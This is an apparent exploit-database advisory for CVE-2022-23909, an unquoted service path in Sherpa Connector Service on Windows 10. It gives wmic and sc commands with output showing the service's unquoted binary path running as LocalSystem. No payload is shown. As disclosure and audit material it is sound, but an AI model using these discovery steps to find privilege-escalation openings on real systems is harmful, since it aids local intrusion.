Sherpa Connector Service 2020.2.20328.2050 Unquoted Service Path

`# Exploit Title: Sherpa Connector Service (v2020.2.20328.2050) - Unquoted Service Path  
# Exploit Author: Manthan Chhabra (netsectuna), Harshit (fumenoid)  
# Version: 2020.2.20328.2050  
# Date: 02/04/2022  
# Vendor Homepage: http://gimmal.com/  
# Vulnerability Type: Unquoted Service Path  
# Tested on: Windows 10  
# CVE: CVE-2022-23909  
  
  
# Step to discover Unquoted Service Path:  
  
  
C:\>wmic service get name,displayname,pathname,startmode | findstr /i "sherpa" | findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """  
  
Sherpa Connector Service Sherpa Connector Service C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe Auto  
  
  
C:\>sc qc "Sherpa Connector Service"  
  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: Sherpa Connector Service  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : Sherpa Connector Service  
DEPENDENCIES : wmiApSrv  
SERVICE_START_NAME : LocalSystem  
`